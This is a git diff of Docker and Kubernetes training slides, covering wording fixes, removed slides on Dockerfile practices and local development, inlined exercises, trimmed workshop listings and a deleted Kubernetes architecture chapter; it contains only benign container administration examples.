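CMD ["hello world"]
```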
|
||||
|
||||
|
||||
@@ -86,7 +86,7 @@ like Windows, macOS, Solaris, FreeBSD ...
|
||||
|
||||
* No notion of image (container filesystems have to be managed manually).
|
||||
|
||||
* Networking has to be set up manually.
|
||||
* Networking has to be setup manually.
|
||||
|
||||
---
|
||||
|
||||
@@ -112,7 +112,7 @@ like Windows, macOS, Solaris, FreeBSD ...
|
||||
|
||||
* Strong emphasis on security (through privilege separation).
|
||||
|
||||
* Networking has to be set up separately (e.g. through CNI plugins).
|
||||
* Networking has to be setup separately (e.g. through CNI plugins).
|
||||
|
||||
* Partial image management (pull, but no push).
|
||||
|
||||
@@ -152,7 +152,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
|
||||
|
||||
* Basic image support (tar archives and raw disk images).
|
||||
|
||||
* Network has to be set up manually.
|
||||
* Network has to be setup manually.
|
||||
|
||||
---
|
||||
|
||||
@@ -164,7 +164,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
|
||||
|
||||
* Run each container in a lightweight virtual machine.
|
||||
|
||||
* Requires running on bare metal *or* with nested virtualization.
|
||||
* Requires to run on bare metal *or* with nested virtualization.
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.
|
||||
|
||||
* `--ip-range` (in CIDR notation) indicates the subnet to allocate from.
|
||||
|
||||
* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).
|
||||
* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
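As an illustration, a hedged example combining these options (the addresses are made up; `--subnet` is the companion flag defining the network's overall address range):

```bash
$ docker network create mynet \
    --subnet 10.10.0.0/16 \
    --ip-range 10.10.1.0/24 \
    --aux-address "my-router=10.10.1.2"
```

Containers attached to `mynet` would then get addresses from `10.10.1.0/24`, and `10.10.1.2` would never be handed out.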
|
||||
|
||||
---
|
||||
|
||||
@@ -528,9 +528,7 @@ Very short instructions:
|
||||
- `docker network create mynet --driver overlay`
|
||||
- `docker service create --network mynet myimage`
|
||||
|
||||
If you want to learn more about Swarm mode, you can check
|
||||
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
|
||||
or [these slides](https://container.training/swarm-selfpaced.yml.html).
|
||||
See https://jpetazzo.github.io/container.training for all the deets about clustering!
|
||||
|
||||
---
|
||||
|
||||
@@ -556,7 +554,7 @@ General idea:
|
||||
|
||||
* So far, we have specified which network to use when starting the container.
|
||||
|
||||
* The Docker Engine also allows connecting and disconnecting while the container is running.
|
||||
* The Docker Engine also allows to connect and disconnect while the container runs.
|
||||
|
||||
* This feature is exposed through the Docker API, and through two Docker CLI commands:
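Those two commands are presumably `docker network connect` and `docker network disconnect`; a quick sketch (container and network names are made up):

```bash
$ docker run -d --name web nginx
$ docker network create mynet
$ docker network connect mynet web      # attach the running container to mynet
$ docker network disconnect mynet web   # detach it again, without restarting it
```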
|
||||
|
||||
|
||||
@@ -76,78 +76,6 @@ CMD ["python", "app.py"]
|
||||
|
||||
---
|
||||
|
||||
## Be careful with `chown`, `chmod`, `mv`
|
||||
|
||||
* Layers cannot efficiently store changes in permissions or ownership.
|
||||
|
||||
* Layers cannot efficiently represent a file being moved, either.
|
||||
|
||||
* As a result, operations like `chown`, `chmod`, `mv` can be expensive.
|
||||
|
||||
* For instance, in the Dockerfile snippet below, each `RUN` line
|
||||
creates a layer with an entire copy of `some-file`.
|
||||
|
||||
```dockerfile
|
||||
COPY some-file .
|
||||
RUN chown www-data:www-data some-file
|
||||
RUN chmod 644 some-file
|
||||
RUN mv some-file /var/www
|
||||
```
|
||||
|
||||
* How can we avoid that?
|
||||
|
||||
---
|
||||
|
||||
## Put files in the right place
|
||||
|
||||
* Instead of using `mv`, put files directly in the right place.
|
||||
|
||||
* When extracting archives (tar, zip...), merge the operations into a single layer.
|
||||
|
||||
Example:
|
||||
|
||||
```dockerfile
|
||||
...
|
||||
RUN wget http://.../foo.tar.gz \
|
||||
&& tar -zxf foo.tar.gz \
|
||||
&& mv foo/fooctl /usr/local/bin \
|
||||
&& rm -rf foo
|
||||
...
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Use `COPY --chown`
|
||||
|
||||
* The Dockerfile instruction `COPY` can take a `--chown` parameter.
|
||||
|
||||
Examples:
|
||||
|
||||
```dockerfile
|
||||
...
|
||||
COPY --chown=1000 some-file .
|
||||
COPY --chown=1000:1000 some-file .
|
||||
COPY --chown=www-data:www-data some-file .
|
||||
```
|
||||
|
||||
* The `--chown` flag can specify a user, or a user:group pair.
|
||||
|
||||
* The user and group can be specified as names or numbers.
|
||||
|
||||
* When using names, the names must exist in `/etc/passwd` or `/etc/group`.
|
||||
|
||||
*(In the container, not on the host!)*
|
||||
|
||||
---
|
||||
|
||||
## Set correct permissions locally
|
||||
|
||||
* Instead of using `chmod`, set the right file permissions locally.
|
||||
|
||||
* When files are copied with `COPY`, permissions are preserved.
|
||||
|
||||
---
|
||||
|
||||
## Embedding unit tests in the build process
|
||||
|
||||
```dockerfile
|
||||
|
||||
@@ -1,5 +0,0 @@
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
@@ -1,9 +0,0 @@
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
@@ -1,5 +0,0 @@
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
@@ -203,90 +203,4 @@ bash: figlet: command not found
|
||||
|
||||
* The basic Ubuntu image was used, and `figlet` is not here.
|
||||
|
||||
---
|
||||
|
||||
## Where's my container?
|
||||
|
||||
* Can we reuse that container that we took time to customize?
|
||||
|
||||
*We can, but that's not the default workflow with Docker.*
|
||||
|
||||
* What's the default workflow, then?
|
||||
|
||||
*Always start with a fresh container.*
|
||||
<br/>
|
||||
*If we need something installed in our container, build a custom image.*
|
||||
|
||||
* That seems complicated!
|
||||
|
||||
*We'll see that it's actually pretty easy!*
|
||||
|
||||
* And what's the point?
|
||||
|
||||
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
|
||||
|
||||
---
|
||||
|
||||
## Pets vs. Cattle
|
||||
|
||||
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
|
||||
|
||||
* Pets:
|
||||
|
||||
* have distinctive names and unique configurations
|
||||
|
||||
* when they have an outage, we do everything we can to fix them
|
||||
|
||||
* Cattle:
|
||||
|
||||
* have generic names (e.g. with numbers) and generic configuration
|
||||
|
||||
* configuration is enforced by configuration management, golden images ...
|
||||
|
||||
* when they have an outage, we can replace them immediately with a new server
|
||||
|
||||
* What's the connection with Docker and containers?
|
||||
|
||||
---
|
||||
|
||||
## Local development environments
|
||||
|
||||
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
|
||||
|
||||
* create VM from base template (Ubuntu, CentOS...)
|
||||
|
||||
* install packages, set up environment
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shut down VM
|
||||
|
||||
* next time we need to work on project, restart VM as we left it
|
||||
|
||||
* if we need to tweak the environment, we do it live
|
||||
|
||||
* Over time, the VM configuration evolves, diverges.
|
||||
|
||||
* We don't have a clean, reliable, deterministic way to provision that environment.
|
||||
|
||||
---
|
||||
|
||||
## Local development with Docker
|
||||
|
||||
* With Docker, the workflow looks like this:
|
||||
|
||||
* create container image with our dev environment
|
||||
|
||||
* run container with that image
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shut down container
|
||||
|
||||
* next time we need to work on project, start a new container
|
||||
|
||||
* if we need to tweak the environment, we create a new image
|
||||
|
||||
* We have a clear definition of our environment, and can share it reliably with others.
|
||||
|
||||
* Let's see in the next chapters how to bake a custom image with `figlet`!
|
||||
* We will see in the next chapters how to bake a custom image with `figlet`.
|
||||
|
||||
@@ -70,9 +70,8 @@ class: pic
|
||||
|
||||
* An image is a read-only filesystem.
|
||||
|
||||
* A container is an encapsulated set of processes,
|
||||
|
||||
running in a read-write copy of that filesystem.
|
||||
* A container is an encapsulated set of processes running in a
|
||||
read-write copy of that filesystem.
|
||||
|
||||
* To optimize container boot time, *copy-on-write* is used
|
||||
instead of regular copy.
|
||||
@@ -178,11 +177,8 @@ Let's explain each of them.
|
||||
|
||||
## Root namespace
|
||||
|
||||
The root namespace is for official images.
|
||||
|
||||
They are gated by Docker Inc.
|
||||
|
||||
They are generally authored and maintained by third parties.
|
||||
The root namespace is for official images. They are put there by Docker Inc.,
|
||||
but they are generally authored and maintained by third parties.
|
||||
|
||||
Those images include:
|
||||
|
||||
@@ -192,7 +188,7 @@ Those images include:
|
||||
|
||||
* Ready-to-use components and services, like redis, postgresql...
|
||||
|
||||
* Over 150 at this point!
|
||||
* Over 130 at this point!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -156,7 +156,7 @@ Option 3:
|
||||
|
||||
* Use a *volume* to mount local files into the container
|
||||
* Make changes locally
|
||||
* Changes are reflected in the container
|
||||
* Changes are reflected into the container
|
||||
|
||||
---
|
||||
|
||||
@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer
|
||||
|
||||
* `namer` is the name of the image we will run.
|
||||
|
||||
* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.
|
||||
* We don't specify a command to run because it is already set in the Dockerfile.
|
||||
|
||||
Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).
|
||||
|
||||
@@ -192,7 +192,7 @@ The flag structure is:
|
||||
[host-path]:[container-path]:[rw|ro]
|
||||
```
|
||||
|
||||
* `[host-path]` and `[container-path]` are created if they don't exist.
|
||||
* If `[host-path]` or `[container-path]` doesn't exist it is created.
|
||||
|
||||
* You can control the write status of the volume with the `ro` and
|
||||
`rw` options.
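For example, a read-only bind mount using that flag structure (the paths are placeholders):

```bash
$ docker run -it -v /path/on/host:/path/in/container:ro ubuntu bash
```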
|
||||
@@ -255,13 +255,13 @@ color: red;
|
||||
|
||||
* Volumes are *not* copying or synchronizing files between the host and the container.
|
||||
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating one path with another.
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
|
||||
|
||||
* Bind mounts are *kind of* similar to symbolic links, but at a very different level.
|
||||
|
||||
* Changes made on the host or on the container will be visible on the other side.
|
||||
|
||||
(Under the hood, it's the same file anyway.)
|
||||
(Since under the hood, it's the same file on both anyway.)
|
||||
|
||||
---
|
||||
|
||||
@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*
|
||||
|
||||
--
|
||||
|
||||
* Let's majorly mess up our container.
|
||||
* Let's mess up majorly with our container.
|
||||
|
||||
(Remove files or whatever.)
|
||||
|
||||
@@ -319,7 +319,7 @@ and *canary deployments*.
|
||||
<br/>
|
||||
Use the `-v` flag to mount our source code inside the container.
|
||||
|
||||
3. Edit the source code outside the container, using familiar tools.
|
||||
3. Edit the source code outside the containers, using regular tools.
|
||||
<br/>
|
||||
(vim, emacs, textmate...)
|
||||
|
||||
|
||||
@@ -86,13 +86,13 @@ class: extra-details, deep-dive
|
||||
|
||||
- the `unshare()` system call.
|
||||
|
||||
- The Linux tool `unshare` allows doing that from a shell.
|
||||
- The Linux tool `unshare` allows to do that from a shell.
|
||||
|
||||
- A new process can re-use none / all / some of the namespaces of its parent.
|
||||
|
||||
- It is possible to "enter" a namespace with the `setns()` system call.
|
||||
|
||||
- The Linux tool `nsenter` allows doing that from a shell.
|
||||
- The Linux tool `nsenter` allows to do that from a shell.
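A hedged sketch of using `nsenter` to join the namespaces of a running container (assuming a container named `web` exists; pick only the namespaces you need):

```bash
# Find the PID of the container's first process
$ PID=$(docker inspect --format '{{.State.Pid}}' web)

# Enter that process's namespaces and start a shell there
$ sudo nsenter --target $PID --mount --uts --ipc --net --pid sh
```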
|
||||
|
||||
---
|
||||
|
||||
@@ -138,11 +138,11 @@ class: extra-details, deep-dive
|
||||
|
||||
- gethostname / sethostname
|
||||
|
||||
- Allows setting a custom hostname for a container.
|
||||
- Allows to set a custom hostname for a container.
|
||||
|
||||
- That's (mostly) it!
|
||||
|
||||
- Also allows setting the NIS domain.
|
||||
- Also allows to set the NIS domain.
|
||||
|
||||
(If you don't know what a NIS domain is, you don't have to worry about it!)
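A tiny illustration of the UTS namespace with `unshare` (the host name shown is indicative only):

```bash
# In a new UTS namespace, changing the hostname doesn't affect the host
$ sudo unshare --uts sh -c 'hostname container-demo; hostname'
container-demo
$ hostname
original-host
```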
|
||||
|
||||
@@ -392,13 +392,13 @@ class: extra-details
|
||||
|
||||
- Processes can have their own root fs (à la chroot).
|
||||
|
||||
- Processes can also have "private" mounts. This allows:
|
||||
- Processes can also have "private" mounts. This allows to:
|
||||
|
||||
- isolating `/tmp` (per user, per service...)
|
||||
- isolate `/tmp` (per user, per service...)
|
||||
|
||||
- masking `/proc`, `/sys` (for processes that don't need them)
|
||||
- mask `/proc`, `/sys` (for processes that don't need them)
|
||||
|
||||
- mounting remote filesystems or sensitive data,
|
||||
- mount remote filesystems or sensitive data,
|
||||
<br/>but make it visible only for allowed processes
|
||||
|
||||
- Mounts can be totally private, or shared.
|
||||
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.
|
||||
|
||||
## User namespace
|
||||
|
||||
- Allows mapping UID/GID; e.g.:
|
||||
- Allows to map UID/GID; e.g.:
|
||||
|
||||
- UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
|
||||
- UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
|
||||
@@ -947,7 +947,7 @@ Killed
|
||||
|
||||
(i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)
|
||||
|
||||
- Allows setting relative weights used by the scheduler.
|
||||
- Allows to set relative weights used by the scheduler.
|
||||
|
||||
---
|
||||
|
||||
@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.
|
||||
|
||||
- Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.
|
||||
|
||||
- The seccomp-bpf extension allows specifying custom filters with BPF rules.
|
||||
- The seccomp-bpf extension allows to specify custom filters with BPF rules.
|
||||
|
||||
- This allows filtering by syscall, and by parameter.
|
||||
- This allows to filter by syscall, and by parameter.
|
||||
|
||||
- BPF code can perform arbitrarily complex checks, quickly, and safely.
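For instance, Docker lets you supply such a filter with `--security-opt` (the profile file here is hypothetical; it would follow Docker's JSON seccomp profile format):

```bash
$ docker run --rm --security-opt seccomp=profile.json alpine sh
```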
|
||||
|
||||
|
||||
@@ -6,6 +6,8 @@ In this chapter, we will:
|
||||
|
||||
* Present (from a high-level perspective) some orchestrators.
|
||||
|
||||
* Show one orchestrator (Kubernetes) in action.
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
@@ -119,7 +121,7 @@ Now, how are things for our IAAS provider?
|
||||
- Solution: *migrate* VMs and shutdown empty servers
|
||||
|
||||
(e.g. combine two hypervisors with 40% load into 80%+0%,
|
||||
<br/>and shut down the one at 0%)
|
||||
<br/>and shutdown the one at 0%)
|
||||
|
||||
---
|
||||
|
||||
@@ -127,7 +129,7 @@ Now, how are things for our IAAS provider?
|
||||
|
||||
How do we implement this?
|
||||
|
||||
- Shut down empty hosts (but keep some spare capacity)
|
||||
- Shutdown empty hosts (but keep some spare capacity)
|
||||
|
||||
- Start hosts again when capacity gets low
|
||||
|
||||
@@ -175,7 +177,7 @@ In practice, these goals often conflict.
|
||||
|
||||
- 16 GB RAM, 8 cores, 1 TB disk
|
||||
|
||||
- Each week, your team requests:
|
||||
- Each week, your team asks:
|
||||
|
||||
- one VM with X RAM, Y CPU, Z disk
|
||||
|
||||
|
||||
@@ -72,7 +72,7 @@
|
||||
|
||||
- For memory usage, the mechanism is part of the *cgroup* subsystem.
|
||||
|
||||
- This subsystem allows limiting the memory for a process or a group of processes.
|
||||
- This subsystem allows to limit the memory for a process or a group of processes.
|
||||
|
||||
- A container engine leverages these mechanisms to limit memory for a container.
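With Docker, for example, this is what the `--memory` flag does (the cgroup path shown assumes cgroup v1 with the cgroupfs driver; it differs under cgroup v2):

```bash
# Cap a container at 256 MB of RAM
$ docker run -d --name capped --memory 256m nginx

# The limit is materialized in the memory cgroup created for the container
$ cat /sys/fs/cgroup/memory/docker/$(docker inspect -f '{{.Id}}' capped)/memory.limit_in_bytes
268435456
```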
|
||||
|
||||
|
||||
@@ -45,13 +45,13 @@ individual Docker VM.*
|
||||
|
||||
- The Docker Engine is a daemon (a service running in the background).
|
||||
|
||||
- This daemon manages containers, the same way that a hypervisor manages VMs.
|
||||
- This daemon manages containers, the same way that an hypervisor manages VMs.
|
||||
|
||||
- We interact with the Docker Engine by using the Docker CLI.
|
||||
|
||||
- The Docker CLI and the Docker Engine communicate through an API.
|
||||
|
||||
- There are many other programs and client libraries which use that API.
|
||||
- There are many other programs, and many client libraries, to use that API.
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:
|
||||
|
||||
* Sharing a *single file* between the host and a container.
|
||||
|
||||
* Using remote storage and custom storage with *volume drivers*.
|
||||
* Using remote storage and custom storage with "volume drivers".
|
||||
|
||||
---
|
||||
|
||||
## Volumes are special directories in a container
|
||||
|
||||
Volumes can be declared in two different ways:
|
||||
Volumes can be declared in two different ways.
|
||||
|
||||
* Within a `Dockerfile`, with a `VOLUME` instruction.
|
||||
|
||||
@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.
|
||||
|
||||
* Volumes are used with the `-v` option.
|
||||
|
||||
* When a host path does not contain a `/`, it is considered a volume name.
|
||||
* When a host path does not contain a /, it is considered to be a volume name.
|
||||
|
||||
Let's start a web server using the two previous volumes.
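A hedged version of that command (the volume names come from previous slides that are not part of this diff, so they are assumptions here; port 1234 matches the `curl localhost:1234` used right after):

```bash
$ docker run -d -p 1234:80 \
    -v webapps:/usr/share/nginx/html \
    nginx
```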
|
||||
|
||||
@@ -189,7 +189,7 @@ $ curl localhost:1234
|
||||
|
||||
* In this example, we will run a text editor in the other container.
|
||||
|
||||
(But this could be an FTP server, a WebDAV server, a Git receiver...)
|
||||
(But this could be a FTP server, a WebDAV server, a Git receiver...)
|
||||
|
||||
Let's start another container using the `webapps` volume.
|
||||
|
||||
|
||||
|
@@ -1,54 +1,3 @@
|
||||
- date: [2019-11-04, 2019-11-05]
|
||||
country: de
|
||||
city: Berlin
|
||||
event: Velocity
|
||||
speaker: jpetazzo
|
||||
title: Deploying and scaling applications with Kubernetes
|
||||
attend: https://conferences.oreilly.com/velocity/vl-eu/public/schedule/detail/79109
|
||||
|
||||
- date: 2019-11-13
|
||||
country: fr
|
||||
city: Marseille
|
||||
event: DevopsDDay
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: http://2019.devops-dday.com/Workshop.html
|
||||
|
||||
- date: [2019-09-24, 2019-09-25]
|
||||
country: fr
|
||||
city: Paris
|
||||
event: ENIX SAS
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
|
||||
- date: 2019-07-16
|
||||
country: us
|
||||
city: Portland, OR
|
||||
event: OSCON
|
||||
speaker: bridgetkromhout
|
||||
title: "Kubernetes 201: Production tooling"
|
||||
attend: https://conferences.oreilly.com/oscon/oscon-or/public/schedule/detail/76390
|
||||
|
||||
- date: 2019-06-17
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Zenika
|
||||
speaker: jpetazzo
|
||||
title: Getting Started With Kubernetes
|
||||
attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
|
||||
|
||||
- date: [2019-06-10, 2019-06-11]
|
||||
city: San Jose, CA
|
||||
country: us
|
||||
event: Velocity
|
||||
title: Kubernetes for administrators and operators
|
||||
speaker: jpetazzo
|
||||
attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
|
||||
slides: https://kadm-2019-06.container.training/
|
||||
|
||||
- date: 2019-05-01
|
||||
country: us
|
||||
city: Cleveland, OH
|
||||
@@ -56,8 +5,6 @@
|
||||
speaker: jpetazzo, s0ulshake
|
||||
title: Getting started with Kubernetes and container orchestration
|
||||
attend: https://us.pycon.org/2019/schedule/presentation/74/
|
||||
slides: https://pycon2019.container.training/
|
||||
video: https://www.youtube.com/watch?v=J08MrW2NC1Y
|
||||
|
||||
- date: 2019-04-28
|
||||
country: us
|
||||
@@ -75,7 +22,6 @@
|
||||
speaker: jpetazzo
|
||||
title: Opérer et administrer Kubernetes
|
||||
attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
|
||||
slides: https://kadm-2019-04.container.training/
|
||||
|
||||
- date: [2019-04-23, 2019-04-24]
|
||||
country: fr
|
||||
@@ -85,7 +31,7 @@
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
slides: https://kube-2019-04.container.training/
|
||||
slides: https://kube-2019-04.container.training
|
||||
|
||||
- date: [2019-04-15, 2019-04-16]
|
||||
country: fr
|
||||
|
||||
@@ -30,11 +30,27 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- - containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- |
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- |
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -48,7 +64,13 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- |
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- - containers/Docker_Machine.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -30,11 +30,9 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -47,7 +45,6 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
title: |
|
||||
Kubernetes 201
|
||||
Production tooling
|
||||
|
||||
#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
chat: "[Gitter](https://gitter.im/k8s-workshops/oscon2019)"
|
||||
#chat: "In person!"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://container.training/
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
- static-pods-exercise
|
||||
|
||||
chapters:
|
||||
- shared/title.md
|
||||
- logistics-bridget.md
|
||||
- k8s/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - k8s/prereqs-k8s201.md
|
||||
- k8s/localkubeconfig-k8s201.md
|
||||
- k8s/architecture-k8s201.md
|
||||
- - k8s/healthchecks.md
|
||||
- k8s/kubercoins-k8s201.md
|
||||
- k8s/authn-authz-k8s201.md
|
||||
- - k8s/resource-limits-k8s201.md
|
||||
- k8s/metrics-server.md
|
||||
- - k8s/cluster-sizing-k8s201.md
|
||||
- k8s/horizontal-pod-autoscaler.md
|
||||
- k8s/extending-api.md
|
||||
- k8s/helm.md
|
||||
- - k8s/lastwords-admin.md
|
||||
- k8s/links-bridget.md
|
||||
- shared/thankyou.md
|
||||
- k8s/operators.md
|
||||
@@ -1,390 +0,0 @@
|
||||
# Kubernetes architecture
|
||||
|
||||
We can arbitrarily split Kubernetes into two parts:
|
||||
|
||||
- the *nodes*, a set of machines that run our containerized workloads;
|
||||
|
||||
- the *control plane*, a set of processes implementing the Kubernetes APIs.
|
||||
|
||||
Kubernetes also relies on underlying infrastructure:
|
||||
|
||||
- servers, network connectivity (obviously!),
|
||||
|
||||
- optional components like storage systems, load balancers ...
|
||||
|
||||
---
|
||||
|
||||
## Control plane location
|
||||
|
||||
The control plane can run:
|
||||
|
||||
- in containers, on the same nodes that run other application workloads
|
||||
|
||||
(example: Minikube; 1 node runs everything)
|
||||
|
||||
- on a dedicated node
|
||||
|
||||
(example: a cluster installed with kubeadm)
|
||||
|
||||
- on a dedicated set of nodes
|
||||
|
||||
(example: Kubernetes The Hard Way; kops)
|
||||
|
||||
- outside of the cluster
|
||||
|
||||
(example: most managed clusters like AKS, EKS, GKE)
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## What runs on a node
|
||||
|
||||
- Our containerized workloads
|
||||
|
||||
- A container engine like Docker, CRI-O, containerd...
|
||||
|
||||
(in theory, the choice doesn't matter, as the engine is abstracted by Kubernetes)
|
||||
|
||||
- kubelet: an agent connecting the node to the cluster
|
||||
|
||||
(it connects to the API server, registers the node, receives instructions)
|
||||
|
||||
- kube-proxy: a component used for internal cluster communication
|
||||
|
||||
(note that this is *not* an overlay network or a CNI plugin!)
|
||||
|
||||
---
|
||||
|
||||
## What's in the control plane
|
||||
|
||||
- Everything is stored in etcd
|
||||
|
||||
(it's the only stateful component)
|
||||
|
||||
- Everyone communicates exclusively through the API server:
|
||||
|
||||
- we (users) interact with the cluster through the API server
|
||||
|
||||
- the nodes register and get their instructions through the API server
|
||||
|
||||
- the other control plane components also register with the API server
|
||||
|
||||
- API server is the only component that reads/writes from/to etcd
|
||||
|
||||
---
|
||||
|
||||
## Communication protocols: API server
|
||||
|
||||
- The API server exposes a REST API
|
||||
|
||||
(except for some calls, e.g. to attach interactively to a container)
|
||||
|
||||
- Almost all requests and responses are JSON following a strict format
|
||||
|
||||
- For performance, the requests and responses can also be done over protobuf
|
||||
|
||||
(see this [design proposal](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md) for details)
|
||||
|
||||
- In practice, protobuf is used for all internal communication
|
||||
|
||||
(between control plane components, and with kubelet)
|
||||
|
||||
---
|
||||
|
||||
## Communication protocols: on the nodes
|
||||
|
||||
The kubelet agent uses a number of special-purpose protocols and interfaces, including:
|
||||
|
||||
- CRI (Container Runtime Interface)
|
||||
|
||||
- used for communication with the container engine
|
||||
- abstracts the differences between container engines
|
||||
- based on gRPC+protobuf
|
||||
|
||||
- [CNI (Container Network Interface)](https://github.com/containernetworking/cni/blob/master/SPEC.md)
|
||||
|
||||
- used for communication with network plugins
|
||||
- network plugins are implemented as executable programs invoked by kubelet
|
||||
- network plugins provide IPAM
|
||||
- network plugins set up network interfaces in pods
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
# The Kubernetes API
|
||||
|
||||
[
|
||||
*The Kubernetes API server is a "dumb server" which offers storage, versioning, validation, update, and watch semantics on API resources.*
|
||||
](
|
||||
https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md#proposal-and-motivation
|
||||
)
|
||||
|
||||
([Clayton Coleman](https://twitter.com/smarterclayton), Kubernetes Architect and Maintainer)
|
||||
|
||||
What does that mean?
|
||||
|
||||
---
|
||||
|
||||
## The Kubernetes API is declarative
|
||||
|
||||
- We cannot tell the API, "run a pod"
|
||||
|
||||
- We can tell the API, "here is the definition for pod X"
|
||||
|
||||
- The API server will store that definition (in etcd)
|
||||
|
||||
- *Controllers* will then wake up and create a pod matching the definition
|
||||
|
||||
---
|
||||
|
||||
## The core features of the Kubernetes API
|
||||
|
||||
- We can create, read, update, and delete objects
|
||||
|
||||
- We can also *watch* objects
|
||||
|
||||
(be notified when an object changes, or when an object of a given type is created)
|
||||
|
||||
- Objects are strongly typed
|
||||
|
||||
- Types are *validated* and *versioned*
|
||||
|
||||
- Storage and watch operations are provided by etcd
|
